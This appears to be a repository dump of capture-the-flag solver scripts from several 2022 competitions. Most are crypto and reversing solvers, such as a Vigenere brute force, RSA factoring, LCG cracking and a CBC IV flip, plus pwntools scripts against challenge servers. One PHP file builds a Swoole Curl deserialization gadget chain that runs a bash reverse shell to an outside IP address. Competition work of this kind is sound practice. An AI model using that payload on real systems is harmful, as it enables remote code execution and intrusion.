60 | print("Flag : {}".format(flag[:flag.index('}')+1])) -------------------------------------------------------------------------------- /solver/2022/dicectf/solver_drive.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python2 2 | 3 | from pwn import * 4 | 5 | r = remote("mc.ax",31822) 6 | # f = open("x.txt","w") 7 | 8 | def leak(): 9 | tmp = "\x21" 10 | tmp += "\x00" # address 11 | tmp += "\x00" # method 12 | 13 | tmp += "\x21" 14 | tmp += "\x01" # address 15 | tmp += "\x00" # method 16 | 17 | tmp += "\x21" 18 | tmp += "\x02" # address 19 | tmp += "\x00" # method 20 | 21 | tmp += "\x21" 22 | tmp += "\x03" # address 23 | tmp += "\x00" # method 24 | 25 | return tmp 26 | 27 | def arithmetic(index1,index2,method): 28 | if(method == "add"): 29 | calc = "\x01" 30 | elif(method == "sub"): 31 | calc = "\x02" 32 | elif(method == "xor"): 33 | calc = "\x03" 34 | elif(method == "mul"): 35 | calc = "\x00" 36 | elif(method == "mod"): 37 | calc = "\x05" 38 | 39 | tmp = "\x20" 40 | tmp += "\x02" # method 41 | tmp += index1 # address 42 | 43 | tmp += "\x20" 44 | tmp += "\x02" # method 45 | tmp += index2 # address 46 | 47 | tmp += "\x10" 48 | tmp += index1 # address 49 | tmp += calc # value 50 | 51 | tmp += "\x20" 52 | tmp += "\x02" # method 53 | tmp += index1 # address 54 | 55 | tmp += "\x21" 56 | tmp += index1 # 57 | tmp += "\x02" # method 58 | return tmp 59 | 60 | def write(address): 61 | tmp = "\x20" 62 | tmp += "\x03" # method 63 | tmp += address # address 64 | return tmp 65 | 66 | def get_value(address): 67 | tmp = "\x21" 68 | tmp += address # address return 69 | tmp += "\x03" # method 70 | return tmp 71 | 72 | def write_to_reg(address,value): 73 | tmp = "\x10" 74 | tmp += address # address 75 | tmp += value # value 76 | return tmp 77 | 78 | def write_return(address): 79 | tmp = "\x20" 80 | tmp += "\x01" # method 81 | tmp += address # address 82 | return tmp 83 | 84 | 85 | def loop(start,finish,op,branch): 86 | if(op=="lt"): 87 | tmp = "\x50" 88 | tmp += start 89 | tmp += finish 90 | tmp += branch 91 | return tmp 92 | 93 | payload = leak() 94 | 95 | #v1 96 | payload += arithmetic("\x00","\x03","add") # arr[0] = arr[0] + arr[3] 97 | payload += arithmetic("\x01","\x00","xor") # arr[1] = arr[1] ^ arr[0] 98 | payload += write("\x01") 99 | #v2 100 | payload += arithmetic("\x01","\x00","xor") 101 | payload += arithmetic("\x00","\x03","sub") 102 | payload += arithmetic("\x01","\x00","add") 103 | payload += arithmetic("\x02","\x01","xor") 104 | payload += write("\x02") 105 | #v3 106 | payload += arithmetic("\x02","\x01","xor") 107 | payload += arithmetic("\x01","\x00","sub") 108 | payload += arithmetic("\x02","\x03","add") 109 | payload += arithmetic("\x00","\x02","xor") 110 | payload += write("\x00") 111 | #v4 112 | payload += arithmetic("\x00","\x02","xor") 113 | payload += arithmetic("\x02","\x03","sub") 114 | payload += arithmetic("\x01","\x02","add") 115 | payload += arithmetic("\x03","\x01","xor") 116 | payload += write("\x03") 117 | 118 | payload += get_value("\x03") 119 | payload += get_value("\x02") 120 | payload += get_value("\x01") 121 | payload += get_value("\x00") 122 | 123 | for i in range(0xff): 124 | payload += write("\x00") 125 | payload += write("\x01") 126 | payload += write("\x02") 127 | payload += write("\x03") 128 | 129 | payload += get_value("\x03") # padding 130 | 131 | #init 132 | payload += write_to_reg("\x00","\x00") 133 | #loop 134 | # print(len(payload)) 135 | payload += write_to_reg("\x03","\x01") 136 | payload += arithmetic("\x00","\x03","add") 137 | payload += get_value("\x01") # junk 138 | payload += get_value("\x01") 139 | payload += arithmetic("\x02","\x01","mul") 140 | payload += get_value("\x03") 141 | payload += arithmetic("\x02","\x03","add") 142 | payload += get_value("\x03") 143 | payload += arithmetic("\x02","\x03","mod") 144 | payload += loop("\x00","\x03","lt","\x0c\xf0") 145 | 146 | payload += write_return("\x02") 147 | payload += get_value("\x02") #junk 148 | payload += get_value("\x01") 149 | payload += get_value("\x00") 150 | payload += get_value("\x03") 151 | payload += write_return("\x00") 152 | payload += write_return("\x01") 153 | payload += write_return("\x03") 154 | 155 | r.sendline(payload.encode('hex')) 156 | r.interactive() 157 | # f.write(payload) -------------------------------------------------------------------------------- /solver/2022/finaloscctf/brute_warmup.py: -------------------------------------------------------------------------------- 1 | import string 2 | 3 | def caesar_dec(p,k): 4 | cipher = "" 5 | for i in range(len(p)): 6 | if p[i].isalpha(): 7 | cipher += chr(((ord(p[i]) + 65 - len(k)) % 26) + 65) 8 | else: 9 | cipher += p[i] 10 | return cipher 11 | 12 | def vigenere_dec(p,k): 13 | cipher = "" 14 | for i in range(len(p)): 15 | if p[i].isalpha(): 16 | cipher += chr((ord(p[i]) + 65 - ord(k[i % len(k)]) + 65) % 26 + 65) 17 | else: 18 | cipher += p[i] 19 | return cipher 20 | 21 | f = open("out.txt").read() 22 | a = f.decode('hex') 23 | known = "OSC" 24 | 25 | from itertools import product 26 | from Crypto.Util.Padding import pad 27 | 28 | for i in product(string.uppercase,repeat=3): 29 | tmp = i[0]+i[1]+i[2] 30 | for j in range(4,len(a)): 31 | key = pad(tmp,j) 32 | res = vigenere_dec(a,key) 33 | res = caesar_dec(res,key) 34 | if(res[:3]=='OSC'): 35 | print(tmp,j,res) 36 | # print(i) 37 | # for i in range(): 38 | # counter = 0 39 | # zz = [] 40 | # dictt = {} 41 | # zz =[[]]*3 42 | # for y,x in enumerate(known): 43 | # tmp = [] 44 | # for j in string.ascii_uppercase: 45 | # for i in range(1,len(a)): 46 | # key = j*i 47 | # res = vigenere_dec(a[:y+1],key) 48 | # res = caesar_dec(res,key) 49 | # # print(res) 50 | # # print(res[y]) 51 | # if(res[y]==x): 52 | # # tmp.append([j,i]) 53 | # if(j not in zz[y]): 54 | # zz[y].append(j) 55 | # if i in dictt: 56 | # dictt[i] += 1 57 | # else: 58 | # dictt[i] = 1 59 | # for i in dictt: 60 | # print(i,dictt[i]) 61 | 62 | # for i in zz: 63 | # print(i) -------------------------------------------------------------------------------- /solver/2022/finaloscctf/solver_admin.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.Padding import pad, unpad 2 | from pwn import * 3 | 4 | r = remote("128.199.210.141",4246) 5 | r.recvuntil("VECTOR: ") 6 | iv = r.recvline().strip() 7 | r.recvuntil("ENCRYPTED BODY: ") 8 | enc = r.recvline().strip() 9 | pt = 'u=user' 10 | pt = pad(pt,16) 11 | target = 'u=admin' 12 | target = pad(target,16) 13 | # iv = 'bb6dd925ffce05b7ab6feeb4d50c60fc' 14 | iv = iv.decode('hex') 15 | iv = [i for i in iv] 16 | for i in range(2,16): 17 | iv[i] = chr(ord(iv[i])^ord(pt[i])^ord(target[i])) 18 | r.recvuntil("YOUR INITIAL VECTOR: ") 19 | r.sendline(''.join(iv).encode('hex')) 20 | r.recvuntil("YOU ENCRYPTED BODY: ") 21 | r.sendline(enc) 22 | r.interactive() -------------------------------------------------------------------------------- /solver/2022/finaloscctf/solver_factor.py: -------------------------------------------------------------------------------- 1 | from math import factorial 2 | from pwn import * 3 | 4 | def remove_trail(num,check): 5 | tmp = str(num)[::-1] 6 | for i in range(len(tmp)): 7 | if(tmp[i]!=check): 8 | return tmp[i:][::-1] 9 | 10 | import time 11 | 12 | r = remote("128.199.155.5",62919) 13 | start = time.time() 14 | r.recvuntil("= 120.") 15 | resp = r.recvuntil("we have 6!") 16 | arg = resp.split(" ")[-1][:-1] 17 | ans = factorial(int(arg)) 18 | r.sendline(str(ans)) 19 | r.recvuntil("n!.") 20 | for i in range(9): 21 | arg = r.recvuntil("!").split(" ")[-1][:-1] 22 | print(arg) 23 | ans = factorial(int(arg)) 24 | r.sendline(str(ans)[-1]) 25 | r.recvuntil("'504'.") 26 | for i in range(1): 27 | resp = r.recvuntil("!").split(" ") 28 | index = int(resp[3]) 29 | arg = resp[-1][:-1] 30 | ans = factorial(int(arg)) 31 | ans = remove_trail(ans,"0") 32 | ans = str(ans)[-1*index:] 33 | r.sendline(ans) 34 | print(arg,ans,time.time()-start) 35 | r.interactive() -------------------------------------------------------------------------------- /solver/2022/finaloscctf/solver_misc.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | arr = [['100,deepfakes', 4 | '200,4', 5 | '300,teguh aprianto', 6 | '400,electronic sniffing dog', 7 | '500,ardyan vicky ramadhan'] 8 | , 9 | ['100,log4j', 10 | '200,starlabs', 11 | '300,CVE-2022-1096', 12 | '400,starlink', 13 | '500,World Backup Day' 14 | ] 15 | , 16 | ['100,Julius Caesar', 17 | '200,creeper', 18 | '300,the reaper', 19 | '400,The Homeless Hacker', 20 | '500,susan headley'] 21 | , 22 | ['100,moth', 23 | '300,0', 24 | '400,infinity', 25 | '500,Princess of Parallelograms' 26 | ] 27 | , 28 | ['100,Muhammad Rafi Ammar', 29 | '200,Yose Hendra Naibaho', 30 | '300,agus setiyandi and raymond leon sembiring', 31 | '400,26 September 2013', 32 | '500,d9775a0ba138a29c57d2e1d79697bfe4']] 33 | 34 | cat = ["Sound Familiar","Cybersecurity Now","Cybersecurity History","Computer Programming","OSINT"] 35 | point = ["100","200","300","400","500"] 36 | 37 | r = remote("128.199.210.141",62911) 38 | r.recvuntil("!\n") 39 | r.sendline("ready") 40 | for j,i in enumerate(arr): 41 | tmp_cat = cat[j] 42 | for k in i: 43 | r.recvuntil("500\n\n") 44 | tmp_k = k.split(',') 45 | point = tmp_k[0] 46 | answer = tmp_k[1] 47 | trig = " ".join([tmp_cat,point]) 48 | r.sendline(trig) 49 | r.recvuntil("Your answer:") 50 | r.sendline(answer) 51 | r.recvline() 52 | # print(trig,answer) 53 | # print(r.recvline()) 54 | r.recvline() 55 | r.interactive() -------------------------------------------------------------------------------- /solver/2022/finaloscctf/test_warmup.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.Padding import pad 2 | 3 | f = open("out.txt").read() 4 | a = f.decode('hex') 5 | 6 | def caesar_dec(p,k): 7 | cipher = "" 8 | for i in range(len(p)): 9 | if p[i].isalpha(): 10 | cipher += chr(((ord(p[i]) + 65 - len(k)) % 26) + 65) 11 | else: 12 | cipher += p[i] 13 | return cipher 14 | 15 | def vigenere_dec(p,k): 16 | cipher = "" 17 | for i in range(len(p)): 18 | if p[i].isalpha(): 19 | cipher += chr((ord(p[i]) + 65 - ord(k[i % len(k)]) + 65) % 26 + 65) 20 | else: 21 | cipher += p[i] 22 | return cipher 23 | 24 | KEY = 'SUPERSECR' 25 | # KEY += 'ERBCB' 26 | import string 27 | for i in range(len(KEY),12): 28 | for j in string.ascii_uppercase: 29 | tmp_key = KEY + j 30 | tmp_key = pad(tmp_key,11) 31 | # print(len(tmp_key)) 32 | # print(tmp_key.encode('hex')) 33 | res = vigenere_dec(a,tmp_key) 34 | res = caesar_dec(res,tmp_key) 35 | print(j,res) 36 | inp = raw_input("Input Key : ") 37 | KEY += inp 38 | print(KEY) -------------------------------------------------------------------------------- /solver/2022/findit/solver_angle.py: -------------------------------------------------------------------------------- 1 | import string 2 | 3 | target = "110' 260' 50' 110' 240' 0' 290' 20' 0' 280' 20' 120' 40' 300' 0' 110' 230' 90' 300' 0' 340' 350' 290' 260' 110' 240' 170' 350' 110' 120'" 4 | target = target.replace("'","") 5 | list_string = string.digits + string.ascii_uppercase 6 | # print(target) 7 | # target = [10,120] 8 | flag = "" 9 | for i in target.split(' '): 10 | if(i=='0'): 11 | flag += ' ' 12 | else: 13 | flag += list_string[(int(i)//10)-1] 14 | # print(i,list_string[(int(i)//10)-1]) 15 | print("FindITCTF{"+flag+"}") 16 | # FindITCTF{AP4AN S1 R1B3T AM8T XYSPANGYAB} -------------------------------------------------------------------------------- /solver/2022/findit/solver_cry.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import * 2 | import gmpy2 3 | 4 | def nextPrime(prime): 5 | if isPrime(prime): 6 | return prime 7 | else: 8 | return nextPrime(prime+1) 9 | 10 | def find(n): 11 | p = gmpy2.iroot(n // 2401, 7)[0] 12 | for _ in range(2**16): 13 | p -= 1 14 | if n % p == 0 and isPrime(p): 15 | q = nextPrime(7*p) 16 | r = nextPrime(p*q) 17 | s = nextPrime(q*r) 18 | return [p,q,r,s] 19 | 20 | n = 991780332070847898144930172913707154337428968947289369950557418182205916671610439120415358846651351930506089582472303042933616371165128107548726642508866988284488166396083880240510413080431759514941229838260223120292397812794508537379728621988207944460296809293569542376203 21 | e = 65537 22 | c = "a42d23224b72bcd5de3712ea6e172eb1e664f3a56d0913b54d53064708a9a7d2d039db467296c41fccdff6ef0ccc6605c2cb6b1a7bff8870a3b8bf2a9a96cba566d2a22c86e5ef25be144856976a7d0c113a54bb187997625c2dee5cdb484a5b43ca6b00df900f580f3d07d50004cd312d" 23 | c = bytes_to_long(bytes.fromhex(c)) 24 | p, q, r, s = find(n) 25 | assert p*q*r*s == n 26 | 27 | phin = (p-1)*(q-1)*(r-1)*(s-1) 28 | d = inverse(e,phin) 29 | m = pow(c,d,n) 30 | print(long_to_bytes(m)) -------------------------------------------------------------------------------- /solver/2022/findit/solver_last.py: -------------------------------------------------------------------------------- 1 | f = open('lasttransmission.txt','r').read() 2 | dec = '' 3 | for i in f.split(' '): 4 | dec += chr(int(i,2)) 5 | print(dec) -------------------------------------------------------------------------------- /solver/2022/findit/solver_modhex.py: -------------------------------------------------------------------------------- 1 | import string 2 | 3 | key = 25 4 | 5 | def decode(flag): 6 | flag = flag.strip() 7 | encode1 = [] 8 | encode2 = [] 9 | final = [] 10 | for i in flag.split(' '): 11 | encode2.append(int(i,16)) 12 | for i in encode2: 13 | encode1.append(i//key) 14 | flagNumber = [] 15 | for i in encode1: 16 | tmp = i 17 | while(tmp>37): 18 | tmp -= 37 19 | flagNumber.append(tmp) 20 | # print(flagNumber) 21 | for i in flagNumber: 22 | zz = [] 23 | tmp = i 24 | while tmp<=125: 25 | tmp2 = chr(tmp) 26 | if( tmp2 in string.printable[:-6] ): 27 | zz.append(tmp2) 28 | tmp+=32 29 | final.append(zz) 30 | return final 31 | 32 | 33 | tmp = decode('3872 340D C4E 24EA 1E5F 3B47 34A3 2134 3EE4 92E 1B3F B9F 28A0 2D37') 34 | for i in tmp: 35 | print(i) -------------------------------------------------------------------------------- /solver/2022/findit/solver_shuffle.py: -------------------------------------------------------------------------------- 1 | 2 | import math 3 | import functools 4 | 5 | reduce = functools.reduce 6 | gcd = math.gcd 7 | 8 | def egcd(a, b): 9 | if a == 0: 10 | return (b, 0, 1) 11 | else: 12 | g, x, y = egcd(b % a, a) 13 | return (g, y - (b // a) * x, x) 14 | 15 | def modinv(b, n): 16 | g, x, _ = egcd(b, n) 17 | if g == 1: 18 | return x % n 19 | 20 | def crack_unknown_increment(states, modulus, multiplier): 21 | increment = (states[1] - states[0]*multiplier) % modulus 22 | return modulus, multiplier, increment 23 | 24 | def crack_unknown_multiplier(states, modulus): 25 | multiplier = (states[2] - states[1]) * modinv(states[1] - states[0], modulus) % modulus 26 | return crack_unknown_increment(states, modulus, multiplier) 27 | 28 | def crack_unknown_modulus(states): 29 | diffs = [s1 - s0 for s0, s1 in zip(states, states[1:])] 30 | zeroes = [t2*t0 - t1*t1 for t0, t1, t2 in zip(diffs, diffs[1:], diffs[2:])] 31 | modulus = abs(reduce(gcd, zeroes)) 32 | return crack_unknown_multiplier(states, modulus) 33 | 34 | class prng_lcg: 35 | 36 | def __init__(self, seed, m,n,c): 37 | self.state = seed # the "seed" 38 | self.m = m 39 | self.n = n 40 | self.c = c 41 | 42 | def next(self): 43 | self.state = (self.state * self.m + self.c) % self.n 44 | return self.state 45 | 46 | def prev(self): 47 | self.state = (self.state - self.c) % self.n 48 | return int(self.state) 49 | 50 | 51 | list_num = [990533, 5928762, 3081967, 4467492, 2395420, 4185481, 3145024, 1571952, 6423870, 5575354, 5508961, 679844, 3583044, 465152, 1747215, 6431758, 4800983, 3645878, 5217012, 3830895, 3421389, 3121743, 6111812, 2014360, 6791068, 4277394, 7171740, 729986, 805727, 1689328, 1022671, 2500329, 6257405] 52 | import requests 53 | 54 | r = requests.session() 55 | url = 'http://47.243.63.167:13401/' 56 | submit = 'cek.php?tebak={}' 57 | resp = r.get(url) 58 | num = resp.text.split(', <')[0] 59 | list_num = list(map(int,num.split(', '))) 60 | # print(list_num) 61 | n = 0 62 | i = 0 63 | while n==0: 64 | try: 65 | n, m , c = crack_unknown_modulus(list_num[i:]) 66 | except Exception as e: 67 | i += 1 68 | gen = prng_lcg(list_num[0],m,n,c) 69 | for i in range(len(list_num)): 70 | if(i==len(list_num)-1): 71 | # print(gen.next()) 72 | resp = r.get((url+submit).format(gen.next())) 73 | print(resp.text) 74 | else: 75 | gen.next() 76 | -------------------------------------------------------------------------------- /solver/2022/findit/swol2.php: -------------------------------------------------------------------------------- 1 | $p_end_string + 2 && 31 | substr($serialized, $p_end_string, 2) == '";' 32 | )) 33 | { 34 | $current = $p_start_string; 35 | continue; 36 | } 37 | $string = substr($serialized, $p_start_string, $length); 38 | 39 | # Convert every special character to its S representation 40 | $clean_string = ''; 41 | for($i=0; $i < strlen($string); $i++) 42 | { 43 | $letter = $string{$i}; 44 | $clean_string .= ctype_print($letter) && $letter != '\\' ? 45 | $letter : 46 | sprintf("\\%02x", ord($letter)); 47 | ; 48 | } 49 | 50 | # Make the replacement 51 | $new .= 52 | substr($serialized, $last, $p_start - $last) . 53 | 'S:' . $matches[1][0] . ':"' . $clean_string . '";' 54 | ; 55 | $last = $p_end_string + 2; 56 | $current = $last; 57 | } 58 | 59 | $new .= substr($serialized, $last); 60 | return $new; 61 | 62 | } 63 | $o = new Swoole\Curl\Handlep("http://baidu.com/"); 64 | $o->setOpt(CURLOPT_READFUNCTION,"array_walk"); 65 | $o->setOpt(CURLOPT_FILE, "array_walk"); 66 | $o->exec = array('/bin/bash -c "bash -i >& /dev/tcp/192.3.81.170/1234 0>&1"'); 67 | $o->setOpt(CURLOPT_POST,1); 68 | $o->setOpt(CURLOPT_POSTFIELDS,"aaa"); 69 | $o->setOpt(CURLOPT_HTTPHEADER,["Content-type"=>"application/json"]); 70 | $o->setOpt(CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_1); 71 | 72 | $a = serialize([$o,'exec']); 73 | echo str_replace("Handlep", "Handler", urlencode(process_serialized($a))); 74 | 75 | ?> -------------------------------------------------------------------------------- /solver/2022/imaginary/fix_casino.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | def conv(iv): 4 | if(iv & 0x80000000): 5 | iv = -0x100000000 + iv 6 | return iv 7 | # context.log_level = 'debug' 8 | # r = process("./casino") 9 | r = remote("the-house-always-wins.chal.imaginaryctf.org",1337) 10 | arr = [0]*344 11 | cnt = 0 12 | for i in range(19): 13 | r.recvuntil(">>> ") 14 | r.sendline("5") 15 | r.recvuntil(" is ") 16 | num = r.recvuntil(".") 17 | arr[cnt] = int(num[:-1]) 18 | r.recvuntil(">>> ") 19 | r.sendline("1") 20 | r.recvuntil(" is ") 21 | num = r.recvuntil("!") 22 | cnt += 2 23 | arr[cnt] = int(num[:-1]) 24 | cnt += 2 25 | # print(cnt) 26 | # print r.recvuntil("How").strip("How") 27 | r.recvuntil("money: ") 28 | money = r.recvline().strip() 29 | # for i in range(3): 30 | while True: 31 | try: 32 | r.recvuntil(">>> ") 33 | r.sendline(str(int(money)//2)) 34 | r.recvuntil(" is ") 35 | num = r.recvuntil(".") 36 | arr[cnt] = int(num[:-1]) 37 | cnt += 2 38 | num1 = conv((arr[cnt-(31*2)]<<0xf) + (arr[cnt-34]<<0xf)) 39 | num2 = conv((arr[cnt-(3*2)]<<0xf) + (arr[cnt-34]<<0xf)) 40 | res = (num1+num2)>>0xf 41 | if(res<0): 42 | res &= 0xffff 43 | arr[cnt] = res 44 | # print("guess ",arr[cnt]) 45 | r.recvuntil(">>> ") 46 | if(arr[cnt] > arr[cnt-2]): 47 | r.sendline("1") 48 | else: 49 | r.sendline("2") 50 | r.recvuntil(" is ") 51 | num = r.recvuntil("!") 52 | arr[cnt] = int(num[:-1]) 53 | # print("real ",arr[cnt]) 54 | r.recvuntil("money: ") 55 | money = r.recvline().strip() 56 | print("money : ", money) 57 | cnt += 2 58 | cnt %= 344 59 | except Exception as e: 60 | # print(r.recvall()) 61 | r.interactive() 62 | # r.close() -------------------------------------------------------------------------------- /solver/2022/imaginary/fix_deobf.py: -------------------------------------------------------------------------------- 1 | [ 2 | globals().__setitem__(chr(0x67),globals()), 3 | g.__setitem__(chr(0x74),lambda*a:bytes.fromhex('{:x}'.format(a[0])).decode()), 4 | 5 | g.__setitem__('g',type('',(dict,),{ 6 | '__call__':lambda*a:{**{_:getattr(a[0],'__setitem__')(*[(i%8 if type(i) is (1).__class__ else i) for (i) in _[::-1]]) for (_) in a[1:]}, 7 | a.__reduce__:a[0]}.popitem()[len(a)%2*2-1], 8 | '__getitem__':lambda*a:dict.__getitem__(*[(i%8 if type(i) is (4).__class__ else i) for (i) in a])})()) 9 | 10 | ,[ 11 | g((lambda*a:(print(*a)),7))((type('',([].__class__,), 12 | {'__hash__':lambda*a:1, 13 | '__call__':lambda*a:g(([a[0].insert(0,list.pop(a[0])),a[0]][1][a[-1]],5)), 14 | 'append':lambda*a:[list.append(a[0],_)for(_)in a[1:]], 15 | 'pop':lambda*a:(list.pop(a[0]),a[0].reverse())[0]})(),5))[5].append(*[g()[5],*[lambda*a:g[7]('no')]*15]), 16 | g((open('z.py').read(),2)), 17 | g()[7] 18 | ][any(any(_ in '#\n#\n#\n#\n' for(_)in(i))for(i)in open('z.py'))+1](('no','newlines!')) 19 | 20 | ,[g((g((lambda*a:int(''.join(str(1*i)for(i)in(a)),2),6))[5].__getattribute__('__class__')(),3)) 21 | [3].append(*(lambda*a:(True, 22 | True, 23 | True, 24 | True), 25 | lambda*a:(False, 26 | True, 27 | True, 28 | True), 29 | lambda*a:(False, 30 | False, 31 | False, 32 | 'a'))), 33 | g((input('>>> ').encode(),15553)), 34 | g[7]][('f\n'[1] in g()[2])+1](('stop trying to debug me','fool!')) 35 | 36 | ,[g[5](g()[6](*g()[3].pop()(*g()[1])))for(i)in iter(g()[3].__len__,0)] 37 | 38 | ,g[7]('yes') 39 | ] -------------------------------------------------------------------------------- /solver/2022/imaginary/helper_otp.py: -------------------------------------------------------------------------------- 1 | jumbler = [] 2 | jumbler.extend([2**n for n in range(300)]) 3 | jumbler.extend([3**n for n in range(300)]) 4 | jumbler.extend([4**n for n in range(300)]) 5 | jumbler.extend([5**n for n in range(300)]) 6 | jumbler.extend([6**n for n in range(300)]) 7 | jumbler.extend([7**n for n in range(300)]) 8 | jumbler.extend([8**n for n in range(300)]) 9 | jumbler.extend([9**n for n in range(300)]) 10 | 11 | 12 | dictt = {} 13 | for i in jumbler: 14 | if(str(i)[0] in dictt): 15 | dictt[str(i)[0]] += 1 16 | else: 17 | dictt[str(i)[0]] = 0 18 | 19 | # print(dictt) 20 | for i in dictt: 21 | print(i,dictt[i]) -------------------------------------------------------------------------------- /solver/2022/imaginary/helper_pol.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | static_val=[] 4 | class SolverEquation(gdb.Command): 5 | def __init__ (self): 6 | super (SolverEquation, self).__init__ ("solve-equation",gdb.COMMAND_OBSCURE) 7 | 8 | def invoke (self, arg, from_tty): 9 | global static_val 10 | gdb.execute("start") 11 | arch = gdb.selected_frame().architecture() 12 | # for i in range(40): 13 | while True: 14 | gdb.execute("si") 15 | try: 16 | current_pc = addr2num(gdb.selected_frame().read_register("pc")) 17 | except Exception as e: 18 | print(static_val) 19 | # print(current_pc) 20 | disa = arch.disassemble(current_pc)[0] 21 | # print(disa["asm"]) 22 | if('sub al,' in disa["asm"]): 23 | static_val.append(disa["asm"]) 24 | elif('BYTE PTR [rip+0x7]' in disa["asm"]): 25 | gdb.execute("set $al=0") 26 | print(static_val) 27 | def addr2num(addr): 28 | try: 29 | return int(addr) # Python 3 30 | except: 31 | return long(addr) # Python 2 32 | SolverEquation() -------------------------------------------------------------------------------- /solver/2022/imaginary/solver_casino.py: -------------------------------------------------------------------------------- 1 | # r[n % 344] = r[(n + 313) % 344] + r[(n + 341) % 344]; 2 | 3 | # n = 2 4 | # r[2] = r[315] + r[342]; 5 | # r[3] = r[316] + r[343]; 6 | # r[4] = r[317] + r[344]; 7 | 8 | # n = 33 9 | # r[33] = r[3] + r[342]; 10 | 11 | # 172 12 | # for i in range(1961): 13 | # n = i 14 | # print(n%344,(n + 313) % 344,(n + 341) % 344) 15 | 16 | 17 | # arr = [0]*344 18 | # i = 0 19 | # arr[i+0] = 65422 20 | # arr[i+2] = 16988 21 | # arr[i+4] = 62334 22 | # arr[i+6] = 43306 23 | # print(arr) 24 | 25 | from pwn import * 26 | 27 | def conv(iv): 28 | if(iv & 0x80000000): 29 | iv = -0x100000000 + iv 30 | return iv 31 | 32 | r = process("./casino") 33 | arr = [0]*344 34 | cnt = 0 35 | for i in range(19): 36 | r.recvuntil(">>> ") 37 | r.sendline("5") 38 | r.recvuntil(" is ") 39 | num = r.recvuntil(".") 40 | arr[cnt] = int(num[:-1]) 41 | r.recvuntil(">>> ") 42 | r.sendline("1") 43 | r.recvuntil(" is ") 44 | num = r.recvuntil("!") 45 | cnt += 2 46 | arr[cnt] = int(num[:-1]) 47 | cnt += 2 48 | # print(cnt) 49 | print(cnt) 50 | # tmp = [49497,23570,42229,19708,64136,63592,22123,46074,14262,48894,15931,9858,22460,13345,36005,35860,40140,14981,14392,49559,54883,15514,40214,29068,38995,36241,1679,16432,12077,16532,20669,2513,46286,12108,52183,8136,43748,53000,19703] 51 | # cnt = 0 52 | # for i in range(0,78,2): 53 | # arr[i] = tmp[cnt] 54 | # cnt += 1 55 | # print(arr) 56 | # guess = 78 57 | for i in range(3): 58 | r.recvuntil(">>> ") 59 | r.sendline("5") 60 | r.recvuntil(" is ") 61 | num = r.recvuntil(".") 62 | arr[cnt] = int(num[:-1]) 63 | # print("f ",arr[cnt]) 64 | cnt += 2 65 | num1 = conv((arr[cnt-(31*2)]<<0xf) + (arr[cnt-34]<<0xf)) 66 | num2 = conv((arr[cnt-(3*2)]<<0xf) + (arr[cnt-34]<<0xf)) 67 | res = (num1+num2)>>0xf 68 | if(res<0): 69 | res &= 0xffff 70 | arr[cnt] = res 71 | r.recvuntil(">>> ") 72 | if(arr[cnt] > arr[cnt-2]): 73 | r.sendline("1") 74 | else: 75 | r.sendline("2") 76 | r.recvuntil(" is ") 77 | num = r.recvuntil("!") 78 | arr[cnt] = int(num[:-1]) 79 | # print("s ",arr[cnt]) 80 | # print("z",cnt) 81 | # print(res) 82 | cnt += 2 83 | r.interactive() -------------------------------------------------------------------------------- /solver/2022/imaginary/solver_desrever.py: -------------------------------------------------------------------------------- 1 | a = """ 2 | cexe(')]"}0p381o91_flnj_3ycvgyhz_av_tavferire{sgpv"==)]pni ni _ rof _ esle "9876543210_}{" ni ton _ fi ]_[d.siht[(nioj.""[)"tcerroc","gnorw"((tnirp;)" >>>"(tupni=pni;)"?galf eht si tahW"(tnirp;siht tropmi'[::-1]) 3 | """ 4 | print(a[::-1]) -------------------------------------------------------------------------------- /solver/2022/imaginary/solver_hidden.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import * 2 | 3 | a = [0x7870148bf499d6f9,0x435e9c9331495b55,0x910a96fdf83deb08] 4 | key = 0x39e324b32f573c94 5 | res = [] 6 | for i in a: 7 | # print(hex(key)) 8 | # print(hex(key)) 9 | key *= key 10 | key = i^((key)&0xffffffffffffffff) 11 | res.append(key) 12 | key = a[len(res)-1] 13 | flag = b'' 14 | for i in res: 15 | flag += long_to_bytes(i)[::-1] 16 | print(flag) -------------------------------------------------------------------------------- /solver/2022/imaginary/solver_jor.py: -------------------------------------------------------------------------------- 1 | import gmpy2 2 | from Crypto.Util.number import * 3 | 4 | def p(N): 5 | Enter =1 6 | prime=2# flag 7 | while Enter 0x7 15 | # rbp-0x34 = 0x00000501 16 | # 0x00000501>>0x9 -> 2 (defining register) 17 | # 0x555555559232 = 0x7 18 | 19 | # second 20 | # ecx = 0x30 21 | # eax = [rbp-0x34] -> 0x302 22 | # eax &= 0xf 23 | # rdx = eax 24 | # 230 + rdx (defining register) -> 232 25 | # edx = 0x7 26 | # eax = [rbp-0x34] -> 0x302 27 | # eax >>= 0x9 28 | # edx + ecx -> 0x37 29 | # 231 -> 0x37 30 | 31 | # third 32 | # ecx = 0x37 33 | # eax = 0x302 34 | # eax &= 0xf 35 | # 232 -> 0x1 36 | # ecx + edx = 0x38 (0x37 + 0x1) 37 | 38 | # fourth 39 | # edx = 0x59 40 | # eax = 0x501 41 | # cmp al,dl (0x38,0x59) 42 | 43 | ori = string.printable[:32] 44 | flag = [0]*32 45 | payload = 0x41 46 | add = [] 47 | for i in var_inp: 48 | add.append(i - var_buf[payload] - payload) 49 | 50 | res = [] 51 | for j in range(len(var_chk)): 52 | for i in string.printable[:-6]: 53 | tmp = ord(i) 54 | if(tmp + var_buf[tmp] + add[j] == var_chk[j]&0xff): 55 | res.append(i) 56 | 57 | for i in range(len(ori)): 58 | flag[i] = res[var_buf[:32].index(ord(ori[i]))] 59 | return ''.join(flag) 60 | 61 | def invoke (self, arg, from_tty): 62 | # finding add value by mapping with input A 63 | f = open("x.txt","w") 64 | f.write("A"*32) 65 | f.close() 66 | arch = gdb.selected_frame().architecture() 67 | gdb.execute("del") 68 | gdb.execute("b *0x555555555216") # debugging purpose , check edi = 0xffffffff (finding address of our input) 69 | gdb.execute("r < x.txt") 70 | for i in range(526): 71 | gdb.execute("c") 72 | gdb.execute("del") 73 | gdb.execute("rwatch *0x555555559231") # address of our input, processed by the algorithm 74 | for i in range(7): 75 | gdb.execute("c") 76 | 